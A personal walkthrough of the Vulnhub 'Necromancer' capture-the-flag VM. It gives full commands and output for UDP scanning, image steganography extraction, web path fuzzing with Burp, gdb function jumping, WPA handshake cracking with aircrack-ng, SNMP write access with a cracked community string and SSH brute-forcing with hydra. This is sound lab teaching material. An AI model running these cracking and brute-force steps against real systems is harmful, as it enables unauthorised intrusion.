Vulnhub.com — Necromancer 1 CTF Walkthrough

Following from my last effort with a CTF, I’m pleased to say that I’ve managed to complete my second — Necromancer from Vulnhub.com.

This was a really fun VM to crack — massive variety of things to do from network attacks through binary cracking, bruteforcing, and more.

SPOILER ALERT

From here I’m going to present a walkthrough of how I cracked the VM — including detailed spoilers. If you’re working on it you probably don’t want to be reading any further unless you’re really stuck.

And, once again, this is my own work — except where referenced — and represents a successful way of cracking the VM, not necessarily a ‘good’ way or ‘the best’ way — just my way.

My soundtrack for most of this effort was the eye-wateringly good Purple by Baroness.

A New Challenger Appears.

Flag 1

Learning from Pete’s method of IP detection from our last approach, I pulled the IP address of the VM using

arp-scan -l

This gave me 10.0.2.5 (all other commands will use this as my host IP)

From the start this VM looked like it was going to really baffle me. My initial swings were all misses and it became suddenly very annoying.

nmap -A -Pn -p1–65535 10.0.2.5

gave me nothing.

I also gave Sparta.py a go to see if that could find anything for me, but that came up empty as well.

I tried some standard logins against the VM but nothing.

Eventually,

nmap -sU -p1–65535 10.0.2.5

came to the rescue as it dawned on me that my standard nmap scans were not checking UDP…

The result was that I had a listener on UDP/666.

My next step was to try to connect to it.

nc -u 10.0.2.5 666

produced nothing.

Various other flag combinations couldn’t get any response at all.

I decided to fire up Wireshark to see if I was actually getting anything transmitted or received at all.

Setting Wireshark to listen, I repeated the netcat command — but nothing happened at all.

I didn’t know why and I’d had enough, so I ragequit and decided to watch some Person of Interest instead.

When I came back I realised that I’d left Wireshark running and that it was filled up with data — the VM was periodically ARP polling its entire /24.

Looking at the traffic gave me a port — 4444 — so I listened on that and…

root@kali:~# nc -lvp 4444
listening on [any] 4444 …
10.0.2.5: inverse host lookup failed: Unknown host
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.5] 25784
…V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi…

Finally, some action!

Base64 decoding this string gave

Welcome!
You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.
Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.
The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right! You are trapped!
You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.
As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.
You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.
You open the box, and find a parchment with the following written on it. “Chant the string of flag1 — u666”

So, that’s flag 1 and a new port to look at — UDP/666.

Flag 2

I followed the instructions to chant the flag to the new port I’d found.

root@kali:~# echo -n “e6078b9b1aac915d11b9fd59791030bf” | nc -u 10.0.2.5 666
You gasp for air! Time is running out!

I don’t think that’s the result I’m looking for.

Various other chants resulted in the same thing — so I was obviously making a mistake with my chant.

Since I was running out of time, I wondered whether I should maybe just “hit it harder” (an approach I employ to a number of IRL tasks too…), so

while true; do echo -n “e6078b9b1aac915d11b9fd59791030bf” | nc -u -w1 10.0.2.5 666; done

And, as in real life this didn’t produce a result either. Well, the VM stopped responding and needed a reboot so I guess it did something. Just not something useful.

Maybe it’s that newline that’s causing problems here…

root@kali:~# echo “e6078b9b1aac915d11b9fd59791030bf” | nc -u 10.0.2.5 666
Chant had no affect! Try in a different tongue!

Promising!

So let’s see what the flag — which looks like an MD5 hash — reverses to

opensesame

root@kali:~# echo “opensesame” | nc -u 10.0.2.5 666
A loud crack of thunder sounds as you are knocked to your feet!
Dazed, you start to feel fresh air entering your lungs.
You are free!
In front of you written in the sand are the words:
flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}
As you stand to your feet you notice that you can no longer see the flicker of light in the distance.
You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.
As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.
The birds get closer, and closer, and closer.
Staring up at the crows you can see they are in a formation.
Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.
As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.
666 is closed.

Ok then.

Flag 3

That’s a hint that there might be a webserver to play with now, so

root@kali:~# nikto -h 10.0.2.5
- Nikto v2.1.6
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 10.0.2.5
+ Target Hostname: 10.0.2.5
+ Target Port: 80
+ Start Time: 2016–07–27 13:48:32 (GMT1)
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: OpenBSD httpd
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ 7535 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2016–07–27 13:48:53 (GMT1) (21 seconds)
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested

Nothing terribly exciting there, so let’s browse to it.

Hours have passed since you first started to follow the crows.
Silence continues to engulf you as you treck towards a mountain range on the horizon.
More times passes and you are now standing in front of a great chasm.
Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.
As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.
The necromancer looks towards you with hollow eyes which can only be described as death.
He smirks in your direction, and suddenly a bright light momentarily blinds you.
The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!
The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.
The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

Embedded in the page is a picture of some birds and some feathers.

Cryptic.

I sat and thought long about what the organisation of the feathers might have meant. Was it a physical clue? 3 sets of 3 feathers — port 333?

Nope.

I ran strings against the file to see if there was any message hidden in there

feathers.txt

So that’s something.

I ran exiftool against it to see if there was anything else interesting going on

root@kali:~/Desktop# exiftool pileoffeathers.jpg
ExifTool Version Number : 10.23
File Name : pileoffeathers.jpg
Directory : .
File Size : 36 kB
File Modification Date/Time : 2016:07:27 14:17:28+01:00
File Access Date/Time : 2016:07:27 14:17:28+01:00
File Inode Change Date/Time : 2016:07:27 14:17:28+01:00
File Permissions : rw-r — r — 
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Quality : 60%
XMP Toolkit : Adobe XMP Core 5.0-c060 61.134777, 2010/02/12–17:32:00
Creator Tool : Adobe Photoshop CS5 Windows
Instance ID : xmp.iid:9678990A5A7D11E293DFC864BA726A9F
Document ID : xmp.did:9678990B5A7D11E293DFC864BA726A9F
Derived From Instance ID : xmp.iid:967899085A7D11E293DFC864BA726A9F
Derived From Document ID : xmp.did:967899095A7D11E293DFC864BA726A9F
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 640
Image Height : 290
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 640x290
Megapixels : 0.186

Nope.

A bit of googling suggested that running binwalk against the file would be able to tell me if there was anything untoward going on

root@kali:~/Desktop# binwalk -B pileoffeathers.jpg
DECIMAL HEXADECIMAL DESCRIPTION
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
270 0x10E Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=”” xmlns:xmp=”http://ns.adobe.com/xap/1.0/" xmlns:xmpMM=”http
36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267 0x9193 End of Zip archive

There’s a zip file embedded in there called feathers.txt

I extracted it using binwalk

root@kali:~/Desktop# binwalk -e pileoffeathers.jpg
DECIMAL HEXADECIMAL DESCRIPTION
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, little-endian offset of first image directory: 8
270 0x10E Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=”” xmlns:xmp=”http://ns.adobe.com/xap/1.0/" xmlns:xmpMM=”http
36994 0x9082 Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267 0x9193 End of Zip archive

This actually gave me the zip file as well as the extracted txt file

root@kali:~/Desktop/_pileoffeathers.jpg.extracted# cat feathers.txt
ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==

which looks like base64, so

cat feathers.txt | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} — Cross the chasm at /amagicbridgeappearsatthechasm

Cool — a URI.

Let’s go there.

Flag 4

10.0.2.5/amagicbridgeappearsatthechasm

Another page of text and an embedded image.

You cautiously make your way across chasm.
You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.
The cave before you is protected by some sort of spell cast by the necromancer.
You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.
Hastily you take a few steps back away from the cave entrance.
There must be a magical item that could protect you from the necromancer’s spell.

This picture didn’t conceal any goodies for us — binwalk and strings both came up with nothing.

root@kali:~/Desktop# binwalk -B magicbook.jpg
DECIMAL HEXADECIMAL DESCRIPTION
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 
0 0x0 JPEG image data, JFIF standard 1.01

This took me ages to get past. I think this was the hardest step for me. I tried rescanning to see if anything had changed, I tried connecting to anything and everything I could.

How might a magical item protect me from the spell?

More to the point, what is a ‘magical item’?

So I naturally thought about hitting it harder again. First, I need some magical words because I think I skipped that class at Wizard School so I’m not really down with the lingo.

Luckily Wikipedia has plenty to say:

List of occult terms - Wikipedia, the free encyclopedia

So, I just need to extract the words. Easy right? Yeah, unless you’ve totally forgotten all your bash skills, in which case this turns into a nightmare too.

Anyway:

cat List_of_occult_terms | grep “title=” | cut -d ‘>’ -f3 | cut -d ‘<’ -f1 | tr ‘[:upper:]’ ‘[:lower:]’ > listofwords.txt

We got there.

Turns out the easier way of getting there might have been to use CeWL (thanks, Pete)

cewl https://en.wikipedia.org/wiki/List_of_occult_terms -m4 -d0 -w listofwords.txt

Which is -m4 — minimum word length of 4, -d0 — depth 0 i.e, don’t follow links, -w where to write the results to.

My first effort was to try to fire these at the webserver itself using netcat

for word in $(cat ~/Desktop/listofwords.txt); do echo $word | nc -w1 10.0.2.5 80; done

This was a fail.

My next step was to try to send the words to the actual webpage to attempt to find a further sub-level of the URI, so I switched over to Burp Intruder.

After a bit of a fight with the config (turned out the VM had crashed again and I was banging my head against the wall unnecessarily), I ended up with this

Burp Intruder

with the payload set to be the list of words I’d just created.

This ticked away until finally,

A talisman could protect me!

You can see from the results here that all of the words are getting 404 errors except for ‘talisman’, which returned a 200 and had a page size that was different to the rest.

So I browsed to the new URL and was presented with a binary to download.

root@kali:~/Downloads# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

And since it’s an ELF file

root@kali:~/Downloads# readelf -a talisman
~~~snip~~~
Symbol table ‘.symtab’ contains 75 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 08048134 0 SECTION LOCAL DEFAULT 1
~~~snip~~~
51: 00000000 0 FUNC GLOBAL DEFAULT UND printf@@GLIBC_2.0
52: 0804a894 0 NOTYPE GLOBAL DEFAULT 25 _edata
53: 08048a37 2795 FUNC GLOBAL HIDDEN 14 chantToBreakSpell
54: 08049594 0 FUNC GLOBAL DEFAULT 15 _fini
~~~snip~~~
58: 0804a88c 0 NOTYPE GLOBAL DEFAULT 25 __data_start
59: 08048529 1258 FUNC GLOBAL HIDDEN 14 wearTalisman
60: 00000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
~~~snip~~~
68: 0804a894 0 NOTYPE GLOBAL DEFAULT 26 __bss_start
69: 08048a13 36 FUNC GLOBAL HIDDEN 14 main
70: 00000000 0 NOTYPE WEAK DEFAULT UND _Jv_RegisterClasses
~~~snip~~~

The mass of information this throws up is interesting, but the main takeaways I was looking for were some function names — main, wearTalisman, and chantToBreakSpell.

Another area I spent ages struggling with right here though. I couldn’t actually get the binary to do anything at all — not even connect to a debugger.

Once again I came to use the help of Pete who had spotted that it was a 32bit executable and that was the explanation for why I was having no joy on my 64 bit VM.

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386

was the solution to getting the binary to actually do anything.

So, I ran the binary and it asked me if I wanted to wear the Talisman.

I did.

Nothing happened.

I did this about half a dozen times before I realised I was going to have to try to be a bit smarter about it.

Binary exploitation isn’t a particularly strong area for me, but I knew some pretty high level basics from playing around with the narnia challenges (which I still haven’t actually completed — tut tut).

I googled up on gdb and tried to refresh my memory.

A lot of playing around with it later and it boiled down to —

Put a breakpoint on the main function

(gdb) b main
Breakpoint 1 at 0x8048a21

Run the program

(gdb) run
Starting program: /root/Downloads/talisman
Breakpoint 1, 0x08048a21 in main ()

Tell it to just to the other function instead of just running the wearTalisman function

(gdb) jump chantToBreakSpell
Continuing at 0x8048a3b.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[Inferior 1 (process 6718) exited with code 0342]
(gdb)

Flag 5

That hash reverses to “black magic”, and we now have another port to play with — UDP/31337.

root@kali:~/Downloads# echo “blackmagic” | nc -u 10.0.2.5 31337
As you chant the words, a hissing sound echoes from the ice walls.
The blue aura disappears from the cave entrance.
You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.
You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.
The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.
Suddenly, you are attacked by a swarm of bats!
You aimlessly thrash at the air in front of you!
The bats continue their relentless attack, until…. silence.
Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.
Looking towards one of the torches, you see something on the cave wall.
You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.
/thenecromancerwillabsorbyoursoul
flag5{0766c36577af58e15545f099a3b15e60}

Simples.

Flag 6

Browsing to the new URI we’ve been given

http://10.0.2.5/thenecromancerwillabsorbyoursoul/

Gives us

flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}
You continue to make your way through the cave.
In the distance you can see a familiar flicker of light moving in and out of the shadows.
As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.
You move closer, and then stop frozen with fear.
It’s the necromancer!
Image copyright: Manzanedo
Again he stares at you with deathly hollow eyes.
He is standing in a doorway; a staff in one hand, and an object in the other.
Smirking, the necromancer holds the staff and the object in the air.
He points his staff in your direction, and the stench of death and decay begins to fill the air.
You stare into his eyes and then…….
…… darkness. You open your eyes and find yourself lying on the damp floor of the cave.
The amulet must have saved you from whatever spell the necromancer had cast.
You stand to your feet. Behind you, only darkness.
Before you, a large door with the symbol of a skull engraved into the surface.
Looking closer at the skull, you can see u161 engraved into the forehead.

Flag 7

Linked in this body of text is page called necromancer.

Browsing there gives us another binary to download.

UDP/161 is SNMP — as confirmed by an nmap scan. But there’s not much we can do with SNMP without a community string.

I fired up Metasploit and ran the SNMP enum_login payload

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf auxiliary(snmp_login) > set THREADS 10
THREADS => 10
msf auxiliary(snmp_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(snmp_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(snmp_login) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using the command

show options

will help you fill in the required fields — it’s the just the output from it doesn’t look good here so I snipped it.

This returned no results — so the community string wasn’t one of the popular community strings. As it happens, I could have used a bigger password list and left this bruteforcing for a while to get it, but given that I’ve got the binary sitting around doing nothing I figured there was going to be a more graceful way forward.

To the binary then.

root@kali:~/Downloads# file necromancer
necromancer: bzip2 compressed data, block size = 900k

The file is a bzip2 archive.

root@kali:~/Downloads# bunzip2 necromancer
bunzip2: Can’t guess original name for necromancer — using necromancer.out
root@kali:~/Downloads# ll
total 356
-rw-r — r — 1 root root 251537 Jul 5 12:00 b374k-master.zip
-rw-r — r — 1 root root 81920 Jul 29 14:44 necromancer.out
drwx — — — 2 root root 4096 Jul 5 12:07 php-reverse-shell-1.0
-rwxr-xr-x 1 leigh leigh 9676 Jul 29 13:15 talisman
-rwxrwxrwx 1 root root 9676 Jul 29 09:20 _talisman
root@kali:~/Downloads# file necromancer.out
necromancer.out: POSIX tar archive (GNU)

That unzips to a tar archive

root@kali:~/Downloads# tar -xf necromancer.out
root@kali:~/Downloads# ll
total 436
-rw-r — r — 1 root root 251537 Jul 5 12:00 b374k-master.zip
-rw-r — r — 1 root root 80242 May 10 08:36 necromancer.cap
-rw-r — r — 1 root root 81920 Jul 29 14:44 necromancer.out
drwx — — — 2 root root 4096 Jul 5 12:07 php-reverse-shell-1.0
-rwxr-xr-x 1 leigh leigh 9676 Jul 29 13:15 talisman
-rwxrwxrwx 1 root root 9676 Jul 29 09:20 _talisman
root@kali:~/Downloads# file necromancer.cap
necromancer.cap: tcpdump capture file (little-endian) — version 2.4 (802.11, capture length 65535)

Which untars to a tcpdump capture file.

After loading this into Wireshark I could see that it was a capture of a load of 802.11 wireless traffic. There was nothing interesting going on in there in terms of something I could read and extract, so I turned to google for ideas.

All roads seemed to be pointing to aircrack-ng, so I had a go with that.

root@kali:~# aircrack-ng ~/Downloads/necromancer.cap -w /usr/share/wordlists/rockyou.txt
Opening /root/Downloads/necromancer.cap
Read 2197 packets.
# BSSID ESSID Encryption
1 C4:12:F5:0D:5E:95 community WPA (1 handshake)
Choosing first network as target.
Opening /root/Downloads/necromancer.cap
Reading packets, please wait…
Aircrack-ng 1.2 rc4
[00:00:12] 16100/9822768 keys tested (1352.13 k/s)
Time left: 2 hours, 53 seconds 0.16%
KEY FOUND! [ death2all ]
Master Key : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC
DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7
Transient Key : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C
56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3
C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92
3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D
EAPOL HMAC : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E
root@kali:~#

It would have taken a couple of hours to completely run through the decryption but it only took a few seconds in the end.

And now I’ve got a key — death2all — which is probably my community string.

Back into Metasploit with a different payload

msf auxiliary(snmp_enum) > set COMMUNITY death2all
COMMUNITY => death2all
msf auxiliary(snmp_enum) > run
[+] 10.0.2.5, Connected.
[*] System information:
Host IP : 10.0.2.5
Hostname : Fear the Necromancer!
Description : You stand in front of a door.
Contact : The door is Locked. If you choose to defeat me, the door must be Unlocked.
Location : Locked — death2allrw!
Uptime snmp : -
Uptime system : -
System date : -

Which gives me what looks like a read/write community string — death2allrw.

So now I need to unlock the door, so I need to know where the door actually is

root@kali:~# snmpwalk -c "death2allrw" -v 1 10.0.2.5
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.255
iso.3.6.1.2.1.1.3.0 = Timeticks: (2280404) 6:20:04.04
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"

This is a small extract from the output — we can see the familiar message we go out of the Metasploit payload, but this time we have the SNMP paths for each of the items and it looks like

iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"

is the one we’re going to need to modify.

Some googling led me to this excellent guide on playing with SNMP

How To Use the Net-SNMP Tool Suite To Manage and Monitor Servers | DigitalOcean

root@kali:~# snmpset -c “death2allrw” -v 1 10.0.2.5 iso.3.6.1.2.1.1.6.0 s “Unlocked”
iso.3.6.1.2.1.1.6.0 = STRING: “Unlocked”

where the -c is the community string, -v is the version, and s is because I’m editing a string.

I’ve now unlocked the door so let’s take another look

root@kali:~# snmpwalk -c “death2allrw” -v 1 10.0.2.5
iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.255
iso.3.6.1.2.1.1.3.0 = Timeticks: (2338844) 6:29:48.44
iso.3.6.1.2.1.1.4.0 = STRING: “The door is unlocked! You may now enter the Necromancer’s lair!”
iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”
iso.3.6.1.2.1.1.6.0 = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} — t22”
iso.3.6.1.2.1.1.8.0 = Timeticks: (2) 0:00:00.02

Flags 8, 9, and 10

This looks like I’ve got some SSH action coming — TCP/22. And the new flag reverses to demonslayer. Which is probably my username.

All I need is a password.

Hello, hydra, my old friend

root@kali:~# hydra -s 22 -l demonslayer -P /usr/share/wordlists/rockyou.txt 10.0.2.5 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016–07–29 15:52:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 10.0.2.5 login: demonslayer password: 12345678
1 of 1 target successfully completed, 1 valid password found

Again, completed in a few seconds so no need to sit around for hours waiting for a bruteforce to complete.

root@kali:~# ssh demonslayer@10.0.2.5
demonslayer@10.0.2.5's password:

(cool ascii art which doesn't format properly on here)

THE NECROMANCER!
by @xerubus

$
$ pwd
/home/demonslayer
$ ls
flag8.txt
$ cat flag8.txt
You enter the Necromancer’s Lair!
A stench of decay fills this place.
Jars filled with parts of creatures litter the bookshelves.
A fire with flames of green burns coldly in the distance.
Standing in the middle of the room with his back to you is the Necromancer.
In front of him lies a corpse, indistinguishable from any living creature you have seen before.
He holds a staff in one hand, and the flickering object in the other.
“You are a fool to follow me here! Do you not know who I am!”
The necromancer turns to face you. Dark words fill the air!
“You are damned already my friend. Now prepare for your own death!”
Defend yourself! Counter attack the Necromancer’s spells at u777!

Another port — UDP/777.

My first reaction was to re-use some code from earlier on and chant my occult words at him

for word in $(cat ~/Desktop/wordlist-l.txt); do echo $word | nc -u -w5 10.0.2.5 777; done

but this was a spectactular fail.

I floundered here for a bit before trying to establish the the connection to port directly from within the VM — on the localhost rather than from my attacking VM.

nc -u localhost 777

And now we get the final exam at the end of Wizard School. I don’t know what any of it’s about, but all the answers are entirely google-able.

Note that my tendency to hit Enter a bunch of times whenever I’m presented with a terminal backfired on me here and cost me two of my lives!

Wizard School!

Wizard Sleeve

Flag 11

Where’s that small vile at then?

$ ls -alh
total 44
drwxr-xr-x 3 demonslayer demonslayer 512B Jul 30 02:23 .
drwxr-xr-x 3 root wheel 512B May 11 18:25 ..
-rw-r — r — 1 demonslayer demonslayer 87B May 11 18:25 .Xdefaults
-rw-r — r — 1 demonslayer demonslayer 773B May 11 18:25 .cshrc
-rw-r — r — 1 demonslayer demonslayer 103B May 11 18:25 .cvsrc
-rw-r — r — 1 demonslayer demonslayer 359B May 11 18:25 .login
-rw-r — r — 1 demonslayer demonslayer 175B May 11 18:25 .mailrc
-rw-r — r — 1 demonslayer demonslayer 218B May 11 18:25 .profile
-rw-r — r — 1 demonslayer demonslayer 196B Jul 30 02:22 .smallvile
drwx — — — 2 demonslayer demonslayer 512B May 11 18:25 .ssh
-rw-r — r — 1 demonslayer demonslayer 706B May 11 21:19 flag8.txt

There it is!

$ cat .smallvile
You pick up the small vile.
Inside of it you can see a green liquid.
Opening the vile releases a pleasant odour into the air.
You drink the elixir and feel a great power within your veins!
$

Ooh, I do like to feel great power.

$ su root
Password:
you are not in group wheel
Sorry

Nope.

$ su -
Password:
you are not in group wheel
Sorry

Double nope.

$ sudo su -
Password:
Sorry, user demonslayer is not allowed to execute ‘/usr/bin/su -’ as root on thenecromancer.
$

Triple nope.

Rumours of our great power appear to have been greatly exagerated.

Well what can I do then?

$ sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
env_keep+=”FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK”
User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt

Oh, I see.

$ cat /root/flag11.txt
cat: /root/flag11.txt: Permission denied

Nope.

$ /bin/cat /root/flag11.txt
cat: /root/flag11.txt: Permission denied

Double nope.

$ sudo cat /root/flag11.txt
Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered......

(ascii art)

THE NECROMANCER!
by  @xerubus
flag11{42c35828545b926e79a36493938ab1b1}
Big shout out to Dook and Bull for being test bunnies.
Cheers OJ for the obfuscation help.
Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.
"========================================="
"  xerubus (@xerubus) - www.mogozobo.com  "
"========================================="
$

And flag 11 reverses to

hackergod